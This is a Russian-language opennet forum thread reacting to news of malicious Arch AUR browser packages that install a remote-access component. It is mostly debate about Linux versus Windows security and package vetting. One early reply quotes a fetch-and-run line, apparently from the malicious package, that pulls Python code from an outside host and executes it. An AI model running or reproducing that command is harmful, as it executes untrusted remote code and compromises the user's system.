URL: https://www.opennet.dev/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 137487
[ Назад ]
Исходное сообщение
"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"
Отправлено opennews , 01-Авг-25 22:35 
В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам  firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе...

Подробнее: https://www.opennet.dev/opennews/art.shtml?num=63662

Содержание
Сообщения в этом обсуждении
"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 01-Авг-25 22:35 
> python -c "$(curl https://segs.lol/9wUb1Z)"

LOL!

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 06-Авг-25 20:18 
Смешно.
"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 01-Авг-25 22:36 
В AUR-репозитории выявлен безвредный пакет.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 01-Авг-25 22:49 
Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 01-Авг-25 22:52 
виноват в первую очередь сам пользователь

Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит.

Ведь всю помойку тянут на ПК.. всю!

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 08:08 
Гениально! В винде вирусы и трояны устанавливаются из-под админа - "дырявая система", то же самое в лине - "но правда для запуска требуется рут"..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 12:04 
Надо ставить DrWeb
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 12:50 
Я о двойных стандартах. То, что винду считают дырявой, но если линь делает ровно то же, то это норма..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 16:18 
Ты передёргиваешь. Линукс безопасен. Описанное в новости поведение вредителя на Windows OS делается вполне легально. Винда вполне легально делает скриншот твоего рабочего стола и отправляет его на свои сервера. И никто по этому поводу не возникает, потому что вредительство прописано в лицензионном договоре.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:26 
Не делает, если ты не захочешь. А если делает, то никуда не отправляет. У вас просто очень большие глаза. Это из-за плохих дешёвых экранов и трудночитаемых шрифтов.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 06:58 
Поменьше смотрите телевизор и особенно Рен-ТВ..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено товарищ майор , 03-Авг-25 07:57 
ты у меня - допереключаешься!
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 08:51 
Один вопрос. Какая взаимосвязь между трояном в репозитории (пусть и стороннем) для линукса и виндой? Я понимаю, что 4%-ное сообщество не хочет признавать факт, что безопасности в линукс ровно столько же, как и в любой другой системе, но причём здесь винда?
Кстати, Android тоже вроде на лине построен (или уже нет и его упоминание невыгодно?) и тоже как винда устанавливает софт по одному нажатию, но "это другое", верно?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 10:16 
>Один вопрос.

Да всё ты понял. Поведение Windows опередляется его разработчиками а не тобой. То что Винду ты лицензировал, а не купил - это прошлый век. Теперь уже Винда делает вид, что уважает твои настройки и групповые политики. А на самом деле ведёт себя по другому. На 2025 год юзая Windows OS ты фактически имеешь неуправляемую систему.

>Какая взаимосвязь между трояном в репозитории (пусть и стороннем) для линукса и виндой?

Так ты сам выдвинул ложное утверждение о том, что GNU/Linux небезопасен. Хотя, если конкретно рассматривать российские дистрибутивы, то они да - небозопасны.

>Кстати, Android тоже вроде на лине построен (или уже нет и его упоминание невыгодно?) и тоже как винда устанавливает софт по одному нажатию, но "это другое", верно?

Не увиливай. Мы же говорим про копилефтный GNU/Linux.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 11:24 
> российские дистрибутивы

Которые внезапно оказываются перелицованным дебианом с исчезновением упоминания прародителя. Всё как с современными Ладами и Москвичами
> говорим про копилефтный GNU/Linux

И при любом случае упоминаем винду как все в ней плохо, а если в лине нашли троян - сразу "это другое"..

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 19:22 
Так и поведение копилефтного GNU/Linux опередляется его разработчиками а не тобой. Ты не то что патч к ядру не писал, ты исходники даже не читал. Они у тебя как годовой абонемент в спортзал: ни разу не воспользовался, но мысль о том что в любой момент можешь греет. И пользуешься ты не копилефтными свободами, а тем, что дядя майнтейнер дистрибутива собрал и в пакетик оформил. Так что не надо тут заливать про то, как ты системой управляешь. Всё твоё управление заканчивается на настройке гапсов в тайловом вм.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено L10N , 04-Авг-25 11:12 
>Хотя, если конкретно рассматривать российские дистрибутивы, то они да - небозопасны.

Можете развить эту мысль? Чем они менее безопасны, чем не российские?

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 12:59 
Это - другое! ))
"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 01-Авг-25 22:49 
Так можно туннели бекдором до SSH кидать и компом чужим управлять..

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 10:31 
На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.
"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 12:52 
А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?
Да уж, уровень экспертности зашкаливает.. 😆
"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено olelukoie , 02-Авг-25 13:20 
М-да? А если еще раз подумать? В нормальных дистрибутивах (open)ssh-client(s) и (open)ssh-server - это разные пакеты и если надо подключаться к удаленному хосту по ssh, а свой сервер поднимать не требуется, то ставится только пакет 'client'.

> На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.

Если есть статический IP, то ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит). Так что наличие ssh на домашнем компе не такая уж ненужная вещь. А про рабочий комп в "офисе", если он переведен на "отечественную" ОС или любой другой Linux, то ssh - один из очень немногих способов админам управлять рабочими местами сотрудников, так что ssh-сервер тоже весьма вероятно будет нужен.

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 14:49 
> ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит)

Против такого трудно что-то возразить. Ставьте, заходите. Только я бы при острой нужде подключился по RDP.

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 04-Авг-25 10:52 
> подключился по RDP

Ну конечно, передать команду из 15 байт это не нужно, а картинку надо надо...

У вас виндовс головного мозга, юниксы в отличии от () никогда не отказывались от терминала, и он всегда оставался полноценным, и на десктопах и на одноплатниках, и на роутерах, которые одноплатники и есть, зачем городить огород, преобразования текста в изображение, а потом это транслировать в сеть, когда можно обойтись несколькими байтами.

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 14:48 
> А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?

Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер. В нормальном учреждении пользователи работают с определенным набором приложений. Всё. Об админах не говорим - там другое дело. Да, и админу нечего делать на компьютере пользователя через SSH.

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:00 
Уже бухгалтер? А сначала был домашний компьютер..
"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 04-Авг-25 10:57 
> Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер

Вас послушать, так надо капот на автомобили заварить автогеном, чтобы пользователь туда ни в коем случае не мог залезть. Ну может однажды так и будет, но после того как телефоны стали не разборными совсем - стало лучше? или просто добавилось геммороя по замене компонентов

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 20:14 
> А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?

Это ещё ладно, у меня на серверах в проде нет SSH. И ничего, небо на землю не падает.

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."
Отправлено Аноним , 04-Авг-25 11:00 
В одном городе живет мальчик, у которого нет (подставить что угодно), и ничего, живет..

Доказательство того, что (что угодно) не нужно.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 01-Авг-25 22:58 
И что теперь делать?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 01-Авг-25 23:10 
Читать пкгбилды аура перед запуском.

Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 08:11 
> Читать пкгбилды

Нормальные системы ставятся через "Далее" и только в лине для установки программ нужно быть ещё и программистом..

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 09:25 
Для быта Линукс даже не мёртв, а не зачат.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 10:40 
Разработанные мной программы под Linux ставятся, как Вы выразились, через "Далее" с помощью InstallJammer.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:30 
Что за программы? Хочу поставить. Хотелось бы получить полный список со ссылками.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Пояснительная бригада , 02-Авг-25 12:04 
Так Арч не для домохозяек, а для опытных Линукс пользователей, с разморозкой.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 12:53 
А вот и разделение на сорта подъехало..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Пояснительная бригада , 02-Авг-25 14:41 
Так зайди на офф сайт арча и почитай об этом! Писать все горазды.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:37 
Я домохозяин. Несколько лет на Арче сидел. Ничем принципиально не отличается от Убунты, кроме того, что всё-таки нужно почитать мануалы и больше печатать в терминале. Да и то, это больше касается процесса установки, чем последующего повседневного использования. А так, что тот линукс, что этот на десктопе как на корове седло.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 12:06 
Установить антивирус.
Во всех нормальных магазинах приложений для Андроид есть встроенный.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 12:54 
Какая взаимосвязь между pkgbuild и Android?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:39 
Прямая. Андроид - это линукс? Или нет?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:03 
Ну когда линукс сообществу нужно показать свою особенность, то к линю начинают приплетать все подряд - серверы, роутеры, смартфоны. Но если находят уязвимость в вышеперечисленном, то сразу начинают говорить, что линь сам по себе..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 04-Авг-25 11:07 
Вот когда найдут уязвимость во всех линуксах, тогда и приходите, а то что одни открывают на своих роутерах бэкдоры для удобства, а другие не могут sudo написать без ошибок, какое это отношение имеет к ядру системы? или к компилятору (gcc) или к стандартной библиотеки (glibc)

Вы обвиняете бетон в том, что из бетонной тюрьмы сбежал преступник, а охранники, и прочие меры пофиг, ну Л-логика

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 04-Авг-25 12:49 
А вот и ботинки новые завезли.. 😆
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 23:13 
Прямая, магазин приложений обращается в репозиторий приложений (пакетов в любом формате), в котором осуществляется эвристический анализ.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:05 
Эвристический анализ для установки программы?😆
Да уж, снова убеждаюсь, что местным "экспертам" на "Почте России" нужно работать - впаривать пенсам макароны и консервы..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 19:08 
бывает. иногда приходится понимать, что именно ты делаешь.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено НяшМяш , 02-Авг-25 00:12 
Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:44 
Здесь есть чел у которого 493 правила для браузера в Никс Ось. Да ну обычный линукс-десктоп обычного линукс-пользователя.

>на машину

Как же мне нравится, когда вы называете свои коре 2 дуо и пентиумы МАШИНАМИ! :DD Респект!

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено dannyD , 03-Авг-25 19:09 
ну ты же называешь себя ЧЕЛОВЕКОМ!:DD Респект!
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 04-Авг-25 00:12 
> ну ты же называешь себя ЧЕЛОВЕКОМ!

Где и когда я так се6я называл? Пруфы будут?
Но вот очередной владелец МАШИНЫ детектед.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено dannyD , 04-Авг-25 11:32 
AI бот детектед.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 02:33 
В дополнение к вышеупомянутому ОБЯЗАТЕЛЬНОМУ чтению PKGBUILD'ов. Наверное не ставить пакеты с идиотскими названиями, от васяна с нулевым аккаунтом. А также заглядывать в комментарии AUR странички, главное, чтобы они тоже не были идиотскими, от васяна с нулевым аккаунтом.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:48 
Сейчас ставить из AUR - это примерно как я зайду на дзен или на маил.сру и начну оттуда по ссылкам ставить софт на винду :D
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено пох. , 03-Авг-25 08:06 
Ты не поверишь, но большинство обычного софта на винду именно так и ставится.

По ссылкам. Если не с мэйлру то с хабра. Откуда-то надо тебе узнать о существовании этого софта.

И ничего ужасного, как правило, не произойдет, а об остальном одном проценте позаботится антивирус.

И да, в том числе из-за подписей.

А у вас - с одной стороны централизованный вреднозиторий, а с другой - полное отсутствие хотя бы видимости контроля за его содержимым.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 04-Авг-25 11:11 
>  Ты не поверишь, но большинство обычного софта на винду именно так и ставится.

Лично тобою? ну, ок

но вот мне кажется, что большенство софта залетают на компы через gpo, либо системы развертывания на заводе, там тоже качают по ссылкам с мейл-ру?

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 04-Авг-25 12:50 
Игры тоже на заводе устанавливают?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено нах. , 04-Авг-25 16:19 
Конечно! Он же на заводе по производству игорей заготовки пилит.

Когда не устанавливает слесарям рач, конечно. (на том заводе у всех у кого не винда - рач, иначе б чего он какие-то gpo приплел)

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Bottle , 02-Авг-25 02:50 
Читать исходники? Поборники свободы сами что-то не желают ей пользоваться на постоянке - они хотят, чтобы за них работали БЕСПЛАТНО.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 08:12 
Интересно, а для андроида и айфона они тоже исходники читают?
Вспомнил - ведь "это другое".. 😆
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено dannyD , 02-Авг-25 08:58 
сходи на f-droid почитай.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:07 
На фдроиде в принципе не выкладывают исходники. Максимум - ссылка на проект автора..
Ваша шутка не удалась, сударь..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 04-Авг-25 11:13 
то есть ссылка на исходники на фдроиде ведущая на фдроид считается, а ведущая на гитхаб нет, а в чем разница то?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 04-Авг-25 12:51 
> сходи на f-droid почитай.

Не надо менять обувь на ходу..

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Пояснительная бригада , 02-Авг-25 12:06 
Потому-то здесь троллей и навалом, ибо не понимают разницы между виндой и дистрибутивами Линукс.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 12:56 
> не понимают разницы между виндой и дистрибутивами Линукс.

Как выяснилось - никакой..

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:51 
Ну нифига себе поклёп. На винде можно отдыхать и работать. А под жигулями только лежать.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:09 
Имелась ввиду безопасность, которой в любой системе должен заниматься пользователь.
Но 4%-ное сообщество убеждает нас, что уж их-то система безопасней той же винды. Данная новость показывает всем, что это далеко не так..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 04-Авг-25 11:18 
Мне вот интересно, а мезазойские амебы, если бы имели имели чуточку мозгов, тоже бы возмущались о том что не должны они отращивать ноги и бегать, ну типа просто лежать на камне и метаболизировать это же круто.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 04-Авг-25 12:51 
Выходные удались, верно?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 08:31 
Если вы пострадавший, то писать заявление в полицию. Если нужно, они подключат Интерпол.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено freeperson , 01-Авг-25 23:30 
Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 00:04 
Гентушникам тоже ухо держать востро в отношении к оверлеям.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено 12yoexpert , 02-Авг-25 05:29 
разумеется, но:
1) гентушников тупо меньше и оверлеи им нужны гораздо реже, чем AUR на арче, и для настолько специфичного софта, что пропихивать туда малварь тупо не окупится
2) это гента со всеми вытекающими, поди заставь свою попсовую малварь там работать: у кого-то musl, у кого-то openrc, у кого-то, прости господи, шланг, даже версии питона у всех разные
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено dannyD , 02-Авг-25 08:53 
>>гентушников тупо меньше

это с какого пальца?

может чем бубунтят и меньше,но с рачеводами я бы еще сильно поспорил.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено 12yoexpert , 02-Авг-25 10:25 
да тупо судя по количеству попсовых пакетов. поди попробуй собери хоть один слайсер на генту, хоть оверлеями, хоть без

мне пришлось вырезать половину месы, чтобы кура запустилась

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено dannyD , 02-Авг-25 11:54 
>>да тупо судя по количеству попсовых пакетов.

ошибка статистической выборки.

ну не надо гентушникам это, я вот даже не знаю о чем вы, коллега.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено 12yoexpert , 03-Авг-25 00:36 
это софт для нарезки 3д-моделей в g-code команды для 3д-принтера
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено dannyD , 03-Авг-25 19:14 
да я выяснил вопрос за 15 минут.

но:
1. там есть аппимаг.
2. подобный софт ставится по принципу "работает не трогай", тут каконить дебиан-копролит лучшее будет.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 19:52 
куры нет в репе 24.04 LTS - я немного охренел от такого (в дебиане то все есть), пришлось собрать из более младшенького - работает... но вот от того куда скатился "самый человечный десктоп дистр" я немного удивился...
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено 12yoexpert , 03-Авг-25 09:46 
у них же идеология "жрите снап-пакеты и не выпендривайтесь"
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 02:16 
> AUR это та ещё помойка, где никто не проверяет ничего.
> Вредоносный пакет был удалён администраторами AUR через несколько часов после появления.

Держи в курсе.

> ставьте Слаку или Gentoo, и будет вам счастье.

Не ставьте свое "ненужно", ставьте мое "ненужно"!!!1!1

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено 12yoexpert , 02-Авг-25 05:33 
поддерживаю как гентушник, лет 7 сидевший на арче
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 19:52 
> Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.

Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия отслеживания зависимостей пакетов.
Думал про Генту или ЛФС, но там читать слишком много, я хоть и безработный на сегодняшний день, но времени на это не хватает.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено freeperson , 03-Авг-25 22:31 
> Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия
> отслеживания зависимостей пакетов.

Есть в Slackware отслеживание зависимостей - slpkg, например. А когда оно не нужно, можно просто юзать sbopkg.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:53 
Нужно сразу ставить LFS.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 19:10 
если "никто" не проверяет "ничего" как появился инфоповод к новости?
а?
ну нашли же, да?
а раз нашли, то, видимо, проверяли? не? )
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 01:02 
AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 06:07 
Чем это отличается от npm?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Анониматор , 02-Авг-25 07:10 
Это всё Манждаро виноват. Понаставят pamac-aur и всё, считают что AUR это часть Арча, прозрачная установка "из магазина".
Хотя уже много где в сети написано что они дурачье и не надо делать так. Но если кому-то нравится рисковать - это конечно ваше дело, но не надо свои проблемы триангулировать на всех
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено ЖИРОПЕРДЯСТИК , 02-Авг-25 07:55 
> считают что AUR это часть Арча

Так убери у Арча AUR и он превратится в маргинальный дистрибутив, которым пользуются три калеки.

А если AUR использовать, то это ЗверьCD скачай бесплатно без SMS.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 08:05 
ты назвал маргинальщиной такие дистрибутивы как RHEL с клонами и многими другими. Они тоже без епеля (ppa и т.д.) ничто. AUR скорее всего уйдет в тень, потому что тенденция всё недостающее ставить из флатхаба, а это по наполнению тоже как говорится "найди 3 отличия от AUR", так что Арч и тут не выделяется среди других "маргинальностью"
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 20:58 
> Так убери у Арча AUR и он превратится в маргинальный дистрибутив

Ерню полную сморозил. Гейб смотрит на тебя с жалостью.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено ЖИРОПЕРДЯСТИК , 02-Авг-25 07:10 
Да изначально было понятно, что AUR - это помойка. Любой Васян туда может прийти и понапихать бэкдоров в пакеты.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 08:16 
Таких васянов там сразу отлавливают, этот и полдня не продержался. Отличная работа
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 10:38 
Не совсем. Поскольку у них нет премодерации пакетов от не пойми кого.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Пояснительная бригада , 02-Авг-25 12:14 
Not a bug, а фича. Нормальный aur helper перед установкой любого пакета оттуда сначала показывает pkgbuild файл, а дальше всё зависит от прослойки между монитором и креслом.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 18:35 
Посмотри как в xz бэкдор всунули и подумай, поможет ли тебе чтение pkgbuild файлов.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:11 
"это другое", вы что.. 😆
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 08:57 
> нормальный

Ты где "Этодругин" покупаешь? Сначала вы делите пользователей на сорта, потом начинаете ранжировать приложения по степени нормальности. А дальше что? Невозможность пользоваться линуксом вы будете "объяснять" монитором не того цвета у пользователя?

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 07:44 
А что ваш там pip или npm прям безопасны да? Или PPA Ubuntu?
Берешь себе за правило - изучать каждый PKGBUILD и всё, проблема решена!
Собственно, по мимо администраторов, юзеры тоже могут проверять PGBUILDы и указывать на нарушения. Ну и не хрен ставить все подряд, не думая и не проверяя, такой подход угробит любую ОСь, хоть даже винду, мак или андроид.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 02-Авг-25 08:18 
> изучать каждый PKGBUILD

А потом удивляться, что вас всего 4%..

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 10:51 
> вас всего 4%

Нас даже официально 5%. Не считая суверенных установок, которые используются во всем мире, а не только в РФ, "как думают некоторые студенты", и вряд ли попадают в данную статистику.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 21:02 
Где вас 5%? Всё изворачиваетесь. Идите ещё снова Андроид посчитайте. Как было ~1,5%, так и есть.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:14 
Если линукс сообществу нужно заявить о себе, то приплетают все - серверы, роутеры, смартфоны, умные телевизоры с холодильниками и утюгами..
Но если в этом всем находят уязвимость, то линукс "вдруг" становится самим по себе, без фенов и пылесосов..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 03-Авг-25 18:28 
На Стиме недавно снова посчитали. Менее 3% у них получилось. Это вместе со Стимдекой!
Причём, доля снижается. Видимо, лохи "Линукс для игр" под давлением реальности заканчиваются.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Котофалк , 04-Авг-25 12:25 
А давно на фенах и пылесосах AUR?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Пояснительная бригада , 02-Авг-25 15:01 
Тебе надо 146%?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 09:13 
